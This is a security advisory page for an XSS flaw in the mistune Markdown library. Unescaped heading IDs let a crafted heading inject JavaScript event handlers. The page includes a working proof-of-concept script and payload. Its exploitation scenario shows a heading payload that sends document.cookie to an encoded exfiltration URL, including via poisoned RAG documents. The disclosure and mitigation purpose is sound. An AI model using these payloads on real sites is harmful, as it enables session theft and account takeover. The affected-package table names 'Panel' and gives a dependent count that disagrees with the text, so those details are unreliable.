CVE-2026-44897: mistune: XSS via unescaped heading id= attribute

GHSA-v87v-83h2-53w7 MEDIUM
Published May 9, 2026
CISO Take

Mistune's Markdown renderer inserts heading IDs directly into HTML without escaping, allowing an attacker who controls heading text to break out of the id= attribute and inject arbitrary JavaScript event handlers. The attack requires the heading_id callback — the standard pattern used by every major documentation generator to create human-readable slug anchors — meaning the vast majority of real-world mistune deployments with TOC enabled are affected, not fringe configurations. With 463 downstream dependents spanning documentation platforms, wikis, and AI-powered content pipelines, and a full working PoC already published, the exploitation bar is low once malicious content reaches a rendered page. Upgrade to mistune 3.2.1 immediately, or independently sanitize all heading_id callback return values with html.escape() as an interim workaround.

Sources: GitHub Advisory NVD OpenSSF ATLAS

What is the risk?

Medium risk overall, elevated in AI/ML deployments where LLM-generated or user-submitted Markdown is rendered with mistune. The vulnerability only activates when a custom heading_id callback is in use, but this is the dominant real-world usage pattern for any documentation or wiki platform. No CISA KEV listing and no active exploitation reported, but the PoC is published and reproducible in minutes. The OpenSSF Scorecard of 5.2/10 and package risk score of 26/100 indicate broader supply chain hygiene concerns beyond this specific issue. Risk compounds in agentic pipelines where AI-generated content is rendered before human review.

How does the attack unfold?

Content Injection
Attacker submits Markdown containing a heading with a double-quote XSS payload to a mistune-powered platform such as a wiki, documentation site, chatbot UI, or RAG document store.
AML.T0049
Attribute Breakout
Mistune's heading() renderer passes the raw heading_id callback return value into the id= attribute without escaping; the double-quote terminates the attribute and the injected event handler becomes valid HTML.
Payload Execution
A privileged user visits the rendered page and interacts with the heading element, triggering the injected JavaScript event handler silently in their authenticated browser context.
AML.T0078
Session Compromise
The JavaScript payload exfiltrates session cookies or auth tokens to attacker-controlled infrastructure, enabling account takeover, lateral movement, or data exfiltration within the platform.
AML.T0025

What systems are affected?

Package Ecosystem Vulnerable Range Patched
Panel pip <= 3.2.0 3.2.1
5.7K OpenSSF 6.6 479 dependents Pushed 6d ago 59% patched ~4d to patch Full package profile →

Do you use Panel? You're affected.

How severe is it?

CVSS 3.1
6.1 / 10
EPSS
0.2%
chance of exploitation in 30 days
Higher than 13% of all CVEs
Exploitation Status
No known exploitation
Sophistication
Trivial

What is the attack surface?

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI Required
S Changed
C Low
I Low
A None

What should I do?

5 steps
  1. Upgrade mistune to 3.2.1 (patched release).

  2. If immediate upgrade is blocked, wrap any heading_id callback return value with html.escape() before returning it.

  3. Audit all codebases using add_toc_hook() with a custom heading_id parameter — search for 'add_toc_hook' and 'heading_id' across your dependency tree and application code.

  4. For detection: review rendered HTML output for unescaped double-quote characters inside id= attributes on heading elements (h1–h6).

  5. Apply strict Content Security Policy headers (script-src 'self') on all Markdown-rendering endpoints as defense-in-depth to limit XSS blast radius regardless of library version.

What does CISA's SSVC say?

Decision Track
Exploitation none
Automatable No
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.2 - AI system design and development
NIST AI RMF
MANAGE 2.2 - Risk response for AI systems
OWASP LLM Top 10
LLM05:2025 - Improper Output Handling

Frequently Asked Questions

What is CVE-2026-44897?

Mistune's Markdown renderer inserts heading IDs directly into HTML without escaping, allowing an attacker who controls heading text to break out of the id= attribute and inject arbitrary JavaScript event handlers. The attack requires the heading_id callback — the standard pattern used by every major documentation generator to create human-readable slug anchors — meaning the vast majority of real-world mistune deployments with TOC enabled are affected, not fringe configurations. With 463 downstream dependents spanning documentation platforms, wikis, and AI-powered content pipelines, and a full working PoC already published, the exploitation bar is low once malicious content reaches a rendered page. Upgrade to mistune 3.2.1 immediately, or independently sanitize all heading_id callback return values with html.escape() as an interim workaround.

Is CVE-2026-44897 actively exploited?

No confirmed active exploitation of CVE-2026-44897 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44897?

1. Upgrade mistune to 3.2.1 (patched release). 2. If immediate upgrade is blocked, wrap any heading_id callback return value with html.escape() before returning it. 3. Audit all codebases using add_toc_hook() with a custom heading_id parameter — search for 'add_toc_hook' and 'heading_id' across your dependency tree and application code. 4. For detection: review rendered HTML output for unescaped double-quote characters inside id= attributes on heading elements (h1–h6). 5. Apply strict Content Security Policy headers (script-src 'self') on all Markdown-rendering endpoints as defense-in-depth to limit XSS blast radius regardless of library version.

What systems are affected by CVE-2026-44897?

This vulnerability affects the following AI/ML architecture patterns: Documentation generators and portals, RAG pipelines with Markdown rendering, AI chatbot UIs rendering LLM output, ML model card platforms, Interactive notebooks with Markdown cells.

What is the CVSS score for CVE-2026-44897?

CVE-2026-44897 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 0.23%.

What is the AI security impact?

Affected AI Architectures

Documentation generators and portalsRAG pipelines with Markdown renderingAI chatbot UIs rendering LLM outputML model card platformsInteractive notebooks with Markdown cells

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0049 Exploit Public-Facing Application
AML.T0051.001 Indirect
AML.T0078 Drive-by Compromise

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.6.2
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

## Summary `HTMLRenderer.heading()` builds the opening `<hN>` tag by string-concatenating the `id` attribute value directly into the HTML — with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element. The default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, …) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself — to produce human-readable slug anchors like `#installation` or `#getting-started` — is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute. ## Details **File:** `src/mistune/renderers/html.py` ```python def heading(self, text: str, level: int, **attrs: Any) -> str: tag = "h" + str(level) html = "<" + tag _id = attrs.get("id") if _id: html += ' id="' + _id + '"' # ← _id is never escaped return html + ">" + text + "</" + tag + ">\n" ``` The `text` body (line content) *is* escaped upstream by the inline token renderer, which is why `text` arrives as `&quot;` etc. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned — no escaping occurs at any point in the pipeline. ## PoC **Step 1 — Establish the baseline (safe default IDs)** The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). The default hook generates sequential numeric IDs: ```python md_safe = create_markdown(escape=True) add_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, … bl_src = "## Introduction\n" bl_out, _ = md_safe.parse(bl_src) ``` Output — ID is auto-generated, no user text appears in it: ```html <h2 id="toc_1">Introduction</h2> ``` **Step 2 — Add the realistic trigger: a text-based `heading_id` callback** Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation: ```python def raw_id(token, index): return token.get("text", "") # returns raw heading text as the ID md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ``` **Step 3 — Craft the exploit payload** Construct a heading whose text contains a double-quote followed by an injected attribute: ``` ## foo" onmouseover="alert(document.cookie)" x=" ``` When `raw_id` is called, `token["text"]` is `foo" onmouseover="alert(document.cookie)" x="`. This is passed verbatim to `heading()` as the `id` attribute value. **Step 4 — Observe attribute breakout in the output** ```python ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' ex_out, _ = md_vuln.parse(ex_src) ``` Actual output: ```html <h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2> ``` Note: the heading **body text** is correctly escaped (`&quot;`), but the **`id=` attribute** is not. A user who moves their mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted. ### Script A verification script was created to verify this issue. It creates a HTML page showing the bypass rendering in the browser. ```python #!/usr/bin/env python3 """H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h2.md" bl_src = "## Introduction\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out, _ = md_safe.parse(bl_src) print(f"[{bl_file}]\n{bl_src}") print("[output — id=toc_1, no user content, safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h2.md" ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out, _ = md_vuln.parse(ex_src) print(f"[{ex_file}]\n{ex_src}") print("[output — heading_id returns raw text, id= not escaped]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body> <h1>H2 — Heading ID XSS (unescaped id= attribute)</h1> <p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping. Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p> {case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h2.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example Usage: ```bash python poc.py ``` Once the script is run, open `report_h2.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction | | **Integrity** | DOM manipulation, phishing content injection, forced navigation | | **Availability** | Page freeze or crash available to attacker | **Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's `heading_id` callback without independently sanitising the returned value.

Exploitation Scenario

An adversary targeting an AI documentation platform or knowledge base powered by mistune crafts a Markdown document with the heading: '## Getting Started" onmouseover="fetch(atob(base64_encoded_exfil_url)+document.cookie)" x="'. The document is submitted to a wiki, uploaded as a model card, or injected into a RAG document store. When a privileged user — an admin, auditor, or CISO reviewing a compliance report — views the rendered page and moves their cursor over the heading, the injected event handler fires silently, exfiltrating their session token to attacker-controlled infrastructure. In a RAG pipeline context, a poisoned retrieval document could deliver the same payload against a security analyst's browser session when AI-summarized results are displayed.

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed. HTML body Element attributes (such as src="XYZ") URIs JavaScript sections Casca

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Timeline

Published
May 9, 2026
Last Modified
June 1, 2026
First Seen
May 9, 2026

Related Vulnerabilities